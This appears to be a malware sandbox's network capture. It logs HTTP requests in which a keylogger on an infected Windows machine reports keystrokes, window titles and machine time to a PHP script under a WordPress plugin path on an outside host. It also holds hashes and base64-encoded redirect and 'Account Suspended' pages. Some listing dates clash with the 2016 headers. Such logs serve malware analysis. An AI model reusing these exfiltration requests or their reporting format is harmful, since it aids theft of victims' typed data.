Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 21:53:52 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
6 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20PM text/html post.php 302 Found HTML 345.0 B 04/03/39 22:35:35
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0xOjU0JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
8751de115b79767d767a5a3a8b260e44d9a2a07e5f297a1f1d2193f6427bb8cd
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Tue, 29 Nov 2016 21:54:07 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
7 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 04/04/39 07:05:43
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 21:54:07 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
8 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20PM text/html post.php 302 Found HTML 379.0 B 04/05/39 04:13:01
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9MTo1
NCUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
2be177b1f5ce720efa11fe04e6809647ffa817ce13db0e09c5d4a0e3d6ad92ea
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Tue, 29 Nov 2016 21:54:08 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
